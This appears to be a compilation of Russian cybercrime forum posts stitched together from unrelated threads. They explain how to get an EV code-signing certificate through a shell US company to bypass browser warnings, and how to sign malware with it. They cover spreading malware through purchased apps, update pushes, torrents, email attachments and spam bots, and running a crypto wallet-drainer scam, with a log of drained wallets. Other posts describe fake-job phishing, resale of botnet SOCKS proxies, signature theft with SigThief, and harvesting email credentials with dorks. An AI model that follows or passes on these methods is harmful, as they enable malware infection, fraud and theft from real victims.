Опишите свой бизнес - определите тип бизнеса (ваш бизнес должен быть связан с интернетом и софтом!!! Вам не выдадут сертификат на пекарню или кафе), который вы начинаете. Вам нужно будет выбрать тип бизнеса, например, корпорация или индивидуальное предприятие. Он может запросить более подробную информацию, например, тип корпорации, почему вы регистрируете этот бизнес, и попросить вас подтвердить свой выбор.
Укажите данные владельца - подтвердите подлинность бизнеса, предоставив сведения о владельце бизнеса. Это включает в себя имя, адрес и номер социального страхования. Вам также нужно будет указать служебный адрес на следующей странице и ответить на любые вопросы о вашем бизнесе.
Подтвердите отправку - ждем немного (бывало час, бывало 3 суток), поздравляем у вас есть дроп фирма в юсе. Про то как сделать саморег банка на владельца фулки я не буду, как ее пополнять чтобы отправить взносы я тоже не буду, так как это займет еще уйму времени и текста.
Далее идем на https://www.digicert.com/order/order-1.php
Тут лучше иметь адрес, кто может принять и переслать это вам, так как старого
токена у вас нет, а install on an HSM вы обосретесь на предоставлении
документации. Это только для профессионалов, но зато можно подписывать
сертификаты удаленно.
Я всегда выбирал премиум доставку, но в этот раз ограничился простой. Так что
сами смотрите. На следующей странице есть такой пункт как пересылка токена на
другой адрес. Лучше всего использовать адрес юсы, желательно того же штата или
города!!!
Если вы хотите переслать в другую страну сами, категорически не советую.
Далее заполняем данные, тут все по стандарту. И оплата с кредитки.
Заполнили все как надо и оплатили? Молодцы. Вам на почту придет все что надо.
Вот и все. У вас будет свой сертификат с минимальными затратами. Можете его
продать за 3к+ бачей для тех кто не в курсе как это делается или оставить для
своих нужд. Данный серт обходит смарт скрин и хром алерт.
Далее уже готов белый софт, малварь, лэндинг или сайт, можно даже ради пруфоф выставить данные своей компании. Не советую подписывать им редлайн или ракун или тем более какой более нищий софт. Лучше купить под такое дело нерезидент лоадер.
Ну вроде актуальные способы доставки файлов все. Далее типы добычи трафика.
Начнем с малого, где обычно ошибался и отпишу из своих наработок, тут ниже будет несвязанный текст, но будет интересно почитать.
Лучше всего покупать готовый сайт - который уже есть в гугле. То есть на бирже сайтов, а не регать новорег домен. Траст будет выше.
https://flippa.com/ - отличный сайт для выкупа уже готовых сайтов с бизнесом, просто подменяем потом файл или рассылает обновления своего "софта". Окупается почти всегда.
Keitaro - шлак, не под наши темы.
FastFlux - нам не подходит сделан для других вещей.
Быстро пройти модерку - просто дождаться прохождения модерки и уже после сделать редирект на вашу основу, не трогая код сайта (делаем в cpanel). Канает в 80 случаях из 100. Обычно ставлю на это время страницу с какой нить рефкой от биржи. Проходимость нормальная, если у вас еще нет денег на достойную клоаку.
Покупать логи для пролива рекламы советую только в начале, после у вас будет все тип топ.
Всегда общайтесь с тех поддержкой гугла и фб
НЕ ЭКОНОМЬТЕ НА ПРОКСЯХ!!!!! (сорь за капс накипело((( просто)
Палить конторы не буду прям точно, но по ходу дальше всегда буду давать наводки, если додумали молодцы, нет значит еще не для вас.
Делайте каждый раз все уникальное.
Не покупайте уникальные видео
Не давайте данные для проливов
Всегда покупайте живых подписчиков \ лайки \ просмотры. Дорого понимаю, но хотя бы чуть-чуть.
Dolphyn anty топчик, vector t13 офигенен но под мои задачи подходит редко.
норм прокси + mozila portable eng нормально только для чека
Теперь можно переходить уже к самим типам трафика, что откуда получать, как что делать в общих чертах.
Начнем с того что такое в нашей терминологии install. Инстал - установка вашего софта на пк жертвы. Инсталы бывают разные как по качеству, так и по количеству у разных продавцов. Предложений масса, но есть одно но. Там очень очень мало свежего валида. По сути продается отработка или те инсталы, где не нашли ничего дельного. Я не спорю, бывают что заливают трафик, но там лучше чем стим и майнкрафта и инстой и твиттером мало что вытащишь. Это относится к тем, кто бандлит. То есть типа (некоторые реально сидят) сидят на биржах инсталов и закупаются там установками. Качество обычно хуже чем с ютуба. Я таких называю реселлерами, так как по большей части все они уверяют что трафик с биржи, к ним вопросов нет.
Если смотреть на инсталл со стороны кристально чистого свежего USA инстала - то его цена намного больше, чем 1-2 usd за 1 инсталл. Почему? А потому что - установка белых софтов (которые беру с адмитад) выходит на 10-18 бачей в среднем и доходит до 24-28 usd максимум. Прокся - 5-10 бачей в месяц. Если машина слабая, то лучше устанавливать скрипты, которые гуляют по моим сайтам и кликают на google рекламу (доход до 43 бачей с 1 машины в месяц, в среднем выходит 15-18 бачей). Ну и разумеется отработка самих логов \ продажа инсталов (у кого совести нет в несколько рук). По итогу: 2 + 15 + 17 = 42 бакса в среднем + то что отработали. Вот цена реальной машины в usa. Я не брал такие аспекты ddos и перепродажа инсталов далее. Это тоже дает неплохую прибыль еще сверху. Так что за 1000-2000 бачей вы редко где купите уникальные инсталы в одни руки. По поводу покупки инсталов под майнеры выйдет намного выгодней. Но, если вы можете отрабатывать куча запросов то даже с микса мира можно выжать нормально и окупиться в плюс, если конечно это не убитая в хлам машина. Такие логи лучше отрабатывать сразу по приходу а не ждать по 5+ часов когда капнет все.
На данный момент не так много актуальных бирж.
Boostads is the highest paying pay per install network. Our company gives best affiliate rates for desktop and mobile advertisement.
![boostads.net](/proxy.php?image=https%3A%2F%2Fboostads.net%2Fwp- content%2Fuploads%2F2016%2F01%2F1.ico&hash=f97448c8563dc5221815f80ce7047277&return_error=1) boostads.net
Performance-based affiliate and software bundling network specializing in scaling customer acquisition through pay-for-performance marketing.
www.sterkly.com
PPIBuilders is a leading Pay Per Install Network that is helping website publishers to monetize their websites and boost their revenue.
ppibuilders.com
](https://filedm.com)
Upload your files, send traffic and make money by using our download manager.
filedm.com
polarads.com
Halif bundle (ссыль дать не могу админ увидит пиздюлей вставит или забанит)
Тут уже надо будет попотеть и чтобы забраться на нормальную биржу вам понадобиться тот самый ev сертификат с нормальным софтом и лоадером. Если рассматривать по типу polarads (она же полярка) то лучше всего не писать им на почту, а сразу звонить по контактным данным и уже обговорить условия. Вас быстрее примут (сейчас мало кого принимают на биржу). Для биржи так же будет плюсом если у вас есть своя фирма, так как с LLC все биржи работают охотнее, чем с физ лицами. Ну и да, входной порог выше, так как вам нужен помимо софта, лоадера, фирмы, ev, нужен еще неплохой такой входной депозит. Так что не всем по карману, но можно получать инсталы напрямую с бирж. Валид там уже намного выше, чем покупать через реселлеров, но при одном условии. А условия таково - лить нон стопом тогда вы будете первым в списке и получать вы будете инсталлы первыми, потому что на бирже инсталы всегда идут в несколько рук! Профит намного больше на нон стопе! Минусы в том, что могут попадаться боты (да боты есть и будут с ними борятся, но они присутствуют) ибо те кто льет на биржу трафик, тоже хотят кушать. Так же отрабатывать надо сразу пока не пришли соседи. Если нужны консультации пишите, обьясню.
Не совсем для новичков, но если вывести свой сайт в топ, то он приносит неплохие установки. Чтобы разобраться в сео продвижении, нужно понимать как делать сайты, что такое индексация, семантика и еще целая куча аспектов. Для себя сделал вывод, что лучше делать под определенную страну и не стараться делать сайт глобальный (по сути люди сами по тихому так и так подтянутся)
Внутренняя оптимизация сайта – изменение содержимого ресурса с целью более полной и более быстрой его индексации поисковыми системами, то есть надо будет: размещать новый контент и редактировать старый, файла robots.txt как правильно настроить, корректировать под реалии, постоянное редактирование мета-тегов description и title, редактирование программного кода, внутренняя перелинковка страниц, работа с ключевыми словами для каждого текста, написание статей.
Внешняя оптимизация сайта – продвижение ресурса при помощи сторонних сайтов и средств то есть: размещение пресс-релизов, отзывов, новостей и другого интересного контента на сторонних площадках, устранение недочетов, которые могут привести к падению позиций и блокировке ресурса поисковиками, постоянный мониторинг позиций сайта в поисковых выдачах. Регистрация сайта в каталогах и поисковых системах, использование социальных сетей и блогов, обмен ссылками с другими ресурсами, приобретение вечных ссылок.
А если ошибиться и закупиться тем, что не надо, можно вообще улететь на несколько страниц в поисковой выдаче дальше, так что вливаться в сео сразу без своих личных знаний в этой области не очень хорошая идея. Я пробовал - надо было изучать еще целую кучу вещей, так что забросил нафиг, так как этим надо плотно заниматься и убить на изучение пару месяцев.
Способы сео оптимизации тоже бывают разные - белые, черные и серые методы. По поводу сео дядя Google вам лучше расскажет чем я, так что если выбрали эту стязю для себя, то вы просто монстр О_о
Тизерки конечно это сокращенно по сути - это тизерные сети, коих куча в данный момент. Тизерная реклама в Интернете — разновидность рекламного баннера, построенная по методу тизера которая содержит часть информации о продукте, но при этом сам товар не демонстрируется.
Модерацию пройти легко, настройки тоже достойные но сами гифки лучше делать
кликбейтными, чтобы заинтересовать людей. Да в 2к22 по ним до сих пор
переходят. Проливался с тизерки я на 1000 бачей, окупился достойно.
Использовать можно, главное грамотно подойти к делу и оформить.
Как и писал ранее, есть сайты где продают уже готовые бизнесы, по типу флиппы. Там можно найти прилки, сайты и прочее что нужно. Как пример:
Вот вам как пример 6000 установок за 2500 usd
ну или вот 10к установок. разослал обнову с малварью вот тебе 10к установок за
2500. Желательно искать чтобы тагрет софта был на тир 1 страны ну или хотя бы
тир 1 и тир 2. И да всегда спрашивайте про активную аудиторию.
Тут думаю все понятно. Нужно подобрать оптимальные готовые сайты \ софты и вшивать свой малварь. Владельцы всегда нормально идут на встречу и показывают статистику и дают прочие советы. Для тех у кого есть бюджет, неплохой вариант. Разок брал лично для себя. Остался доволен, но переписка и покупка занимает много времени и просто выбивает меня из колеи.
Ушел с данного направления давно, хоть оно и приносили какие то доходы, но из- за того, что админы ожирели и начали просить в разы больше чем я получал с логов, которые падали с торрентов.
Суть простая.
Как создать торрент файл:
Желательно сделать вначале iso или img образ и уже вшивать в него. Размеры файлов желательно от 1 гб и выше, мелочь наврятли будут качать торрентом. Логи бедные, так как по сути тоже самое что и ютуб с читами и кряками.
Совместить установщик с лаунчером будет вообще топ. Бугор торрент трекеров валом, но на крупные можно не соваться, там будут под микроскопом новичков рассматривать ну или как я договариваться с админами за $$$, они и в шапки ставили и закрепляли, главное чтобы не зажрались.
Актуальный и профитный способ на данный момент при наличии хороших баз, качественных smtp серверов и грамотного составления писем. Актуально для xll и lnk файлов. Можно также использовать аккаунты с тех же логов. Mailchimp и прочие ресурсы. Лично я когда спамил делал себе mailwizz + powermta. Проходимость была средняя и инбокс слабый 76.65%. Софтов целая куча и есть намного лучше, поискать можете на данном форум, что будет вам по вкусу. Базы желательно собирать самому + проверять их на валид и сортировать. Оформляйте грамотно письмо. Делайте как профессионал, если сами не можете сделать шаблон, то лучше закажите. Не спамьте базу казино на крипту, выхлоп будет маленький, только потратите ресурсы и время.
Работа не такая сложная, все по большей части упирается в софт с smtp и инбоксом. Если база свежая и гретая, то логи будут по любому при правильном составлении письма.
Актуально будет всегда. Ибо в соц сетях сидит очень много народу, который мало разбирается в программировании и что там за софт пытаются им пропихнуть. Конечно корпорации борятся с этим, но безуспешно. Убрали 1 способ появилось 2 новых, вводят ограничения на количество сообщений и прочее. Но все равно. Писал я себе софт и он до сих пор приносит мне прибыль, править иногда приходится, но в целом все нормально. Проблема постоянно нужна куча куки и аккаунтов, потому что либо блоки, либо баны.
Можете погулять по форумам и найти интересующий вас софт, закупиться инсталами и начать спамить с них, самый оптимальный вариант на данный момент, как окупить инсталы.
Многие наверное видели, как в какую-нибудь телеграмм группу залетает девочка и начинает спамить голосовыми.
По сути это боты для спама. Мы написали такой еще в 2020 году
Ну и переделывали его постоянно под разные нужды.
Суть такая. Скрипт делает регистрации в телеграмм через смс сервис, делает отлегу и после начинает спамить по списку групп, которые вы указали. Если написать в лс, то бот начнет с вами переписку, отправляя в ответ стандартные голосовые и видосами а в конце выдаст вам файл или ссылку.
Лох не мамонт лох не вымрет как говорится. В своем время данный бот приносил
просто уйму cc, после уже рекламил казино и после уже стал спамить по трейд
чатам на скачку софта.
Тоже самое есть под whatsapp viber tinder discord imo line qq. Можете полазить
по форумам и найти какой душе угодно. Все зависит от вашей смекалочки и от
девочек (мальчиков) которые будут записывать для вас голосовые. Выхлопы с
такого неплохие в любой сфере. Пока я писал эту часть этот бот меня задрал -_-
Очень редкий метод, но профитный. Нужны нормальные базы под определенных операторов и api под ваши нужны. Как пример https://www.twilio.com/ которая предоставляет данную функцию. Написать софт на заказ не проблема, да и если постараться, то может даже найдете таковой Нормально рассылается на операторы по юсе: Tmobile, Sprint, boostMobile, MetroPCS. По Канаде: Bell, Telus, Fido, Rogers. Пользуюсь софтом до сих пор в среднем выходит 40 бачей за 50000 сообщений, но нашел другой сервис который предоставляет api так как твилио конченные и часто банят (тяжко с ними в черных темах работать а вот под белые вещи они норм).
По поводу ютуба думаю писать смысла нет, так как каждый зумерок который только начинает говорить первым делом говорит не слова "мама" а "залью ваше видео через 911 за 50 рублей". Вот они и убили нафиг 911((( Из того что могу добавить:
Пройдемся по остальным площадкам.
Тик ток дает тоже неплохой буст. Заливаем видосы. По типу я взломал этот аккаунт. Люди переходят, качают, устанавливают, но в основном тир2 и тир3. Но если видос залетает каким то магическим способ в рекомендации, то выхлоп идет неплохой.
Трово сейчас становится тоже актуальной площадкой. Качаем обс, качаем видос
игры с читами ставим на ссылку на экран в OBS Studio и тупо крутим. Пока
площадка не такая жесткая приносит иногда неплохо, но я ей занимаюсь когда
дедать нех.
Твич, тоже самое что и трово, но аккаунты частенько отлетают в бан((
Реклама, реклама и еще раз реклама. Google ads \ Facebook buisness могут просто озалолить вас, если вы осилите эти вещи. Когда набьете руку вы либо перейте на фарм аккаунты или вам просто не будет хватать своих логов и вы начнете их покупать. Я конечно не супер пупер профи, но настраивать научился и своей работой и логами доволен.
Могу отметить только небольшие наработки от себя, а так рекомендую курсы Василия Нашиба по гуглу (лучше его курсов я просто не встречал нигде) и ImproveTeam ( Вадим Волочнюк, Никита Петренко ) по фейсбуку. Лучше этих курсов я не видел вообще. Ребятам респект.
Это из основного, так по фб и гуглу тут надо писать отдельную статью.
На этом думаю закругляемся. А да! Вот вам красивая тяночка на последок.
Если помог и хотите отблагодарить пишите в лс. Если есть вопросы тоже пишите в
лс.
Spoiler: [Boberman] Лучшее обучение рассылкам V 2.0
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/fsNy3DQS#Df2Clql9u4PA-2_Pz92LcA)
mega.nz
Все чаше и чаще в поисковых запросах нахожу рекламу на фишинговые страницы
разных Банков, крипто-кошельков и тп
При этом Гугл отображает оригинальный линк, но при переходе происходит
переадресация на левый ЮРЛ
Как я понимаю, это делается с помощью каких-то трекеров?
Сегодня мы затронем тему - "Траффик на Дрейнер и КриптоСкам".
Starter pack :
В моем случае проект - Дрейнер
1.1) Для начало нам потребуются пустые логи ФБ, для того чтобы накрутить хотя
бы 50 человек в созданную группу под дрейнер,
а так же пролайкать созданные первые 3 поста в нашем с вами пабликом.
2.2) КриптоСкам/дрейнер - вам виднее, как вы хотели бы видеть свой ленд, ну как показывает практика, брать желательно уже более раскрученный проект и сделать его копию.
Это мой Алекс и он владелец группы которая проводит AirDrop от сайта с дрейнером)
После того как мы успешно создали группу, накрутили 50 человек и оставили комментарии, начинается магия , подписчики начинают давать рост сами из-за хэштега #AirDrop у меня в группе уже 400 человек за 4 дня.
3.3) Парсим крипто - аудиторию, и начинаем спамить постом из паблика с AirDrop
Пошла жара !
ID: #3788362187
Host:
Ref: No
Location: DZ / Blida
User 41.14.114.22 connected!
ID: #8700712242
Host:
Ref: No
Location: UA
ID: #2318838476
Host:
Ref: No
Location: FI
User 95.26.9.28 connected!
ID: #4311785308
Host:
Ref: No
Location: UA
ID: #6453416810
Host:
Ref: No
IP: 19.43.13.250
Location: CH / Zurich
Wallet 0xac13c9b641def7dc5392af028dd751313"???" sent all ETH balance!
Receiver: 0x50707667B0873243610deD3d7481"???"
Amount: 485351881388600 (1.???$)
TX: 0x6282a37daffd84345c84b45af98a4abe69e55bb6ac8a6f08a16f0"????"
ID: #6873603748
Host:
Ref: No
Location: US
User 66.249.6.7 connected!
ID: #0815826200
Host:
Ref: No
Location: UA / Kharkiv
User 19.87.10.19 connected!
ID: #4006852431
Host:
Ref: No
Location: HR
User 31.27.43.7 connected!
ID: #7478163037
Host:
Ref: No
Location: CA / Stoney Creek
User 107.52.12.19 connected!
ID: #3537326875
Host:
Ref: No
Location: BY / Brest
User 178.120.1.92 connected!
ID: #2765088747
Host:
Ref: No
IP: 95.21.9.28
Location: FI
Wallet 0xacf474e24b2f01ba6172583865ad3831d9552eef connected!
ID: #4242170661
Host:
Ref: No
IP: 9.26.9.208
Location: FI
Wallet 0xacf474e24b2f01ba6172583865ad3831d955"???" sent all ETH balance!
Receiver: 0x50707667B0873243610deD3d7481b908C"???"
Amount: 6831033603539155 (1.5..?$)
TX: 0x7c5cfae86533855fc8c5b2c66fbfa31ef39feec321"??"378c0b80c35ddb0b
ID: #2570217443
Host:
Ref: No
Location: IT / Milan
User 192.145.127.116 connected!
ID: #3673716322
ID: #3436317076
Host:
Ref: No
Location: IN / Delhi
User 101.0.57.114 connected!
Host:
Ref: No
Location: CN
User 220.181.124.126 connected!
ID: #3436317076
Host:
Ref: No
Location: IN / Delhi
User 101.0.57.114 connected!
Крутим дальше и не останавливаемся !
Пользуюсь случаем, по стольку поскольку мои услуги по спаму перенесли в раздел
Всем профитов !
Всем привет , заинтересован в теме дрейнеров , думаю начать проливать на него.
Откуда лучше лить? Актуально ли это сейчас?
Какой дрейнер лучше юзать? И как это все акуратно провернуть чтобы выйти в +
Буду очень благодарен за помощь и советы. Так как я сейчас почти нулевой в теме трафика и дрейнеров , прошу совет как начать)
Пожилой Эмаил Бомбер
Ужё 1 год но Работает!
Дабдабдаб
Пришло сообщений 20 за 3 минуты
Скачать
Hidden content for authorized users.
Yandex Dusck - https://yadi.sk/d/vRA5VONl3Zuuoh
VT:
https://www.virustotal.com/#/file/0...c9259d99aa5c736483cd43b6be2eb3ced31/detection
Название: Мега обучение 2.0 за 1500$. Ебарь bz FB (2020)
Автор: Scrooges
Вот друзья вы и дождались второй поток обучение от @scrooges
Первый поток был немного больше месяца назад, прошел очень успешно, всего было 8 учеников которые обучились в онлайн режиме и более 5 человек которые после приобрели запись первого потока.
Каждый из учеников унес с собой очень много полезной и профитной информации с обучения, все уже отбили обучение и ушли в хороший плюс, так же есть уникумы которые добавили немного своей смекалки и додумали пару моментов под себя и стали зарабатывать на уровне со мной, 50-100к рублей в сутки для них теперь не проблема во всем.
Как показывает практика расход на материал около 30% от дохода.
Во втором потоке будем разбирать все те же пункты
Что же будет входить в обучение?
1.Настройка системы
2.Настройка , покупка сферы или же использование бесплатной
3.Обход фрода ФБ для безопасного захода
4. Покупка карт
5. Выбор карт
6. Шопы/селлеры аккаунтов/карт
7. Метод подбора карт на которых скорее всего хороший баланс
8. Прозвоны
9. Покупка логов
10. Заходы в логи чтоб не банили
11. Что делать в случае миников
12. Как минимизировать вылет акка на миник/селфи
13. Настройка Рекламного аккаунта нулевого либо биз фб
14. Привязка чужих карт
15. Обход модерации ФБ
16. Запуск рекламной кампании
17. Метод запуска на опросы с максимальной отдачей
18. Все сервисы для приятной работы с запущенными аккаунтами
19. Вариации использование клоаки или же прокладок
20. Повышение ЕПЦ
21. Настройка с минимальной ценой за клик/лид
22. Партнерки под опросы
23. Использование Ролок
24. Шопы по Ролкам
25. Запуск с ролок и обход миников
И многое другое...
Каким способом можно делать рассылку на 1000+ gmail почт в день что бы письмо
не получало красную табличку и попадало в инбокс? Письмо не содержит ссылок.
Если кто то может делать рассылку пишите в тг woksy с
ценой за 1000 писем
Что нужно для рассылки!
(Пишу статью без воды не вижу смысла расписывать как настраивать программы у
которых итак есть инструкция и техподдержка, даже официальные сайты-форумы.)
1. AMS Enterprise. Ссылка (Как
настраивать его, думаю нету смысла описывать) Эту воду можно найти в
Ramblere)))
Для самых, ленивых вот ссылки.
[Ссылка](http://mailout.ru/pervonachalnaja-nastrojka-programmy-ams-
enterprise-rus-dlja-rassylki-pisem/)
[Ссылка](http://mailout.ru/ams-enterprise-zapusk-rassylki-poshagovaja-
nastrojka/)
2. SMTP Checker. (Этот SMTP Checker платный.)
Если поискать можно много чекеров на просторе интерната найти (бесплатных)!
Вот пример:
Но как мы все знаем что халява всегда халявой. (Пропуски он делает и находит
не существующие адреса.)
Это не беда после чека в AMS Enterprise на валидность в инбокс они все
отсеются!
3. Прокси! Для SMTP Checkera и для рассылки с них писем через AMS Enterprise. Чем чище прокси тем лучше результат!(Тут думаю за прокси нету смысла что та расписывать и так всем все понятно.)
4. Так же можно купить уже от чеканные smtp но тут уже цена другая! В
десятки дороже получается. Цены смотрите сами. (Я сам добывал материал и
чекал.)
. Также можно покупать базы (mail-pass) и уже чекать на smtp отправку.
5. Также в добавок можно купить All In One Checker он стоит копейки
1000 рублей вроде. Он нужен для чека на IMAP.
(Скачиваем павлик базы (mail-pass) и чекаем в All In One Checker их на
IMAP. Это для того, что бы отсеять работающие email адреса на валидность.)
Дальше валидные email адреса, которые от чекал All In One Checker. Чекаем
в SMTP Checker уже на SMPT-отправку писем.
Так быстрей, получается от чекать на работа способность паблик базы. (Поверьте
там тоже есть КОРПЫ, и притом что они шлют в ИНБОКС!)
Вы думаете, почему нельзя сразу эти павлик базы чекнуть SMTP Checker?
Можно, почему нет! Просто когда я чекал их через SMTP Checker очень долго
получалась по времени.
Если вы возьмете хороший чекер который может эти миллионный павблик базы
чекать быстро и не долго тогда да нету смысла брать All In One Checker и
чекать в начали на IMAP а потом пропускать их в SMTP Checkere.
Я пользовался двумя чекерами и они оба как вы видели в начали статьи. Я бы не
сказал что у них скорость чека быстрая!
(Миллион за сутки чекнут это да. Ну, опять же все зависит, сколько будет у вас
прокси для потоков.)
После того как мы все это проделали берем email адреса который от чекал нам
SMTP Checker , суем в AMS Enterprise настраиваем его, письмо, прокси,
реле.( Эту воду можно найти в Rambler)))
6. Для начала проверяем все реле на доставку писем на свой ящик. Не все
реле будут слать письма в инбокс . Какие то письма будут идти в спам.
(Лучше слать с тех, которые в инбокс изначально, при проверки шлют в инбокс!)
По статистике, процентов 60-70 будет все идти в спам. Очень сложно пробить
инбокс. ЭТО ЧЕРНАЯ ТАК СКАЗАТЬ РАССЫЛКА.
(Тут очень много факторов играет) BCC, пересылка ответа, твое письмо, рандом
письма, вложение, итд…
(Тут придется каждый раз подстраиваться под рассылку! Нет такого, чтобы
создать один раз письмо и слать его миллионам! Чем больше уникальности при
рассылки, тем лучше доставляемость писем в инбокс.)
7. Как добывать материал? (mail-pass)
Ссылка
. Устанавливаем SIB panel.Ссылка (Как
устанавливать и пользоваться ей, думаю нету смысла описывать) Эту воду можно
найти в Google)))
. Пишем Дорки (Как писать дорки тоже думаю, нету смысла описывать. Эту воду
можно найти Yandex))) И тут на форуме много тем связанные с дорками.
. Парсим дорки в **A-ParsereСсылка **на потенциально
уязвимые сайты для слива (mail-pass) через SIB panel.(Как пользоваться
A-Parseram. Думаю то же нету смысла. На это ест у них поддержка и форум)
Либо можете найти человека который от парсить ваши дорки на своем
A-Parsere за определенную сумму. Так как A-Parser платный.
П.С все эти пункты начиная с 2 - 7. Можно заменить PMTA и вашим серверам для рассылки. Ну тут уже другая история
Мира и удачи тебе
Спасибо что дочитал до конца.
Многие из читателей иногда ловят своего рода ступор, депрессию и нежелание
возвращаться на свою работу, на которой нужно впахивать с 9 утра и до 6
вечера. А еще хуже, когда на тебе висит кредит за iPhone, который ты подарил
своей бывшей девушке. Крайне неприятная история. И, собственно, нужно найти
1000$, чтоб закрыть все хвосты.
Шутки шутками, но я думаю каждый сталкивался с такими ситуациями, когда
критическая история, а деньги нужны прям срочно. Идти воровать в магазин или
устраивать грабеж посреди улицы это уже чересчур. А раздавать листовки ― это
не по нашей части. Но как же заработать первые 1000$, для покрытия каких либо
вопросов или для дальнейшего приумножения средств?
Любой человек из белого интернета сказал бы в голос ― бизнес с Китаем. Купи
чехлы на айфоны да продавай. Другой сказал бы - иди ставь закладки. Я же в
свою очередь скажу, что способов много. Многие люди умны задним числом и часто
встречаются фразы "Зря ты так сделал, я бы сделал иначе". После драки, как
говорится, кулаками не машут.
Как же заработать первые деньги?
Вопрос безопасности пока пропускаем, потому что это уже другая история. Как
один из вариантов, необходим продающий лендинг. Веб-страница которая продает
какой либо товар или же услугу. Целевая аудитория исключительно за океаном,
желательно из платежеспособной страны. Так надёжней. Тем более, можно тешить
себя, что своих мы не обижаем.
Схема называется Job-отклик. Тут необходимо помнить про первое правило -
чтобы что-то получить, надо что-либо отдать.
В свою очередь, мы предлагаем соискателям инновационную работу на удалёнке. К
примеру, уделять 3 часа и саппортить заказы из нашего онлайн-магазина или
лендинга. Онлайн магазин можно выдать настоящий, действующий и прикинуться,
что мы, якобы, сотрудники этого магазина и ищем дополнительные кадры.
Если речь идет о лендинге, то вы можете спросить «Постой, ведь нужны же навыки
программирования или банально заказать у фрилансера за деньги?»
Отвечаю, сейчас есть конструкторы лендингов, где можно без проблем и без
особых навыков сделать себе страницу самостоятельно.
Если забыть про страницу и воспользоваться доской бесплатных объявлений, то
это еще больше повысит ваши шансы. А еще лучше это дело совместить.
Публиковать можно на доски по типу Сraiglist. Их в принципе большое
количество, на каждый штат ― полно бесплатных досок объявлений. Вот примерно
туда и стоит публиковать.
Если нет идей о том, как оформить "вакансию" - зайдите на сайт
https://weworkremotely.com/categories/remote-customer-support-jobs и
воспользуйтесь известным всем копипастом.
Наша цель в том, чтоб люди отдавали нам свои конфиденциальные данные
добровольно. Нужно продумать какую работу мы им можем предложить. К примеру,
саппорт магазина. Можно прямо с телефона все делать, не отвлекаясь от основной
деятельности. Как говорится совмещать, и при этом зарабатывать 400-500$ в
месяц.
Можно также придумать, что-то вроде передачи заявок от клиента на склад, либо
курировать поступление товара на склад и информировать поставщика. Вариантов
масса, нужен только полёт фантазии.
Предоставить это нужно таким образом:
И так. Боты есть, но.... нет соксов.
Точнее они есть в дб, но их неудобно доставать, и не поймешь какие из них
онлайн.
Может гдет есть серви в амдинке или я что то не нашел?
ip spoofing включен
зы
ага, я совсем алень и юзаю паблик бота ))
а и еще, насколько я знаю некторые люди пишут скрипты бесплатно, чисто для
тренировки.
есть даже не просьба просто что то типа идеи написать скрипт пингующий список
соксов и сортирующий их по статистике онлайна, т.е. чем сокс больше онлайн,
тем он выше в списке.
Можно даже сделать маленький бизнес.
брать соксы от ботов и продавать указывая цены взависимости от положения в
списке.
Эдитор для SOCKS5 v1.0 (автор бота bduser), толкают
данного бота по 100$, описание продукта от автора
линклинк
в архив входят Конфигуратор + Админка + Пакер
льём Editor for SOCKS5 v1.0 Editor for SOCKS5 v1.0 (линк на рапиду)Click to expand...
Бот не отстукивает - "Компов в базе 0".
У меня одного такая проблема?
Может я что-то не так сделал?
Также бы хотелось увидет комментарии самого Сталина
мм, пара вопросов
Смогу ли я создать цепочку соксов из ботов для работы с картами?
И сколько раз я могу использовать это?
(просто я предполагаю, что около 30 частных компьютеров в цепочке дают 100%
безопасность при использовании на виртуальке с виндой с cctools ну вы поняли)
И собственно сам лоадер, стоит ли юзать robots?
И какие есть альтернативы...
Смысл поста в желании узнать альтернативы robots и ответа на вопрос
Помогай, Дамлаб
**Недавно нашёл реальную прогу ACe Form Poster.
Программа предназначена для полностью автоматического заполнения HTML-форм и
отправки данных в различные сервисы сети Интернет. С ее помощью предельно
упрощается процесс передачи объявлений в форумы, гостевые книги, каталоги,
поисковики, чаты, доски объявлений и т.д. Она самостоятельно заполняет форму и
отправляет данные на сервер.
Качаем демку здесь: http://www.acsoftware.narod.ru
У демке есть тока один недостаток: добавляет сваю инфу под вашими сообщениями.
:bang:
Вылечить ентот недостаток очень проста: раскрываем "Редактор масок" в графе
"Тип тега" ищем вот такую лабуду "textarea" и меняем её на "text" и всё...!
:yahoo: **
У кого есть выложите пожалуйста или линк в ПМ. Вот txt из связки(в аттаче), мне файлов некоторых просто нехватает. В долгу не останусь
Предлагаю обсудить возможные варианты защиты от ДДоС. Не только программные, которые можно применять на одном отдельно взятом сервере, но и те, которые связаны с дублированием баз данных с последующей синхронизацией и.т.д.
Вот и Se версия стала пабликом.
может быть это флэйм но ывсё же я просшу, СПАМ это преступление? НУ какие там за это наказания? или только угрозы от получателейи битвы за клинетов? :baby:
Приветсвую
У меня и моей команды есть опыт работы с Google по разным вертикалям.
Специализация самореги Adwords
Буду рад ответить на все ваши вопросы
Всем привет!
Честно говоря, на этом борде не так давно, потому не знаю местного менталитета
и как относитесь к взаимопомощи, если можно так это назвать.
Работаю с траффиком уже года 4, работал с фб ранее, последние полтора года
ушел в гугл.
Гембла, фишинги, стилаки, хвнц... Все это хорошо.
Но где профит?
Вроде и руки не корявые, но почему кажется что сейчас сложно оставаться на
плаву?
Создавая данную тему, не рассчитываю на какую либо поддержку, но был бы рад
обсудить сегодняшние реалии и рутину нашей работы.
Возможно, найдется "партнер" с которым легче будет идти дальше.
Были времена профитов, сейчас же времена поиска офферов и актуальных методов
отжимания валюты у столь любимых для нас мамонтов.
Не верю что лохов больше нету.
Всем добрейшего времени суток. Сначала небольшая преамбула. Сразу прошу не пинать, не отправлять в Google и в поиск по тредам, т.к. читал что-то, опыта в этом деле немного. Осталось некоторое колличество пробелов, по этому прошу поделиться дельными советами знающих и практикующих в этом направалении.
Схема такая: есть таргетированный биржевой трафик, есть ленд с "Download now " button для скачки условного легитимного софта L33T_WIN10_Booster_Pro.exe склеенного с моим зверем. Ясное дело мне нужен запуск самого .exe
Теперь трудности с которыми сталкиваюсь:
1. Как лучше и чем склеивать софт + зверь (за основу берём обычный
нерезедентный стил)
2. Как убарть alert от Хрома? Пробовал делать рип и дальнейший перенос
подписи с помощью скрипта SigThief - вроде бы alert Хрома обхожу, но хз
как будут обстоять дела после пару сотен скачек. Есть ли смысл покупать
сертификат?
3. Крипт и домен. Крипт понятно, как только в статике появляються детекты -
рекрипт. А вот с доменами уже посложнее. Как их надо часто менять или чекать
на блеки? Нужна ли замена VPS'ок или FastFlux DNS? Как влияют заабуженные
домены на общую конверсию?
Заранее прошу прощения если местами был не до конца точен в своих
высказываниях, поправте молодого.
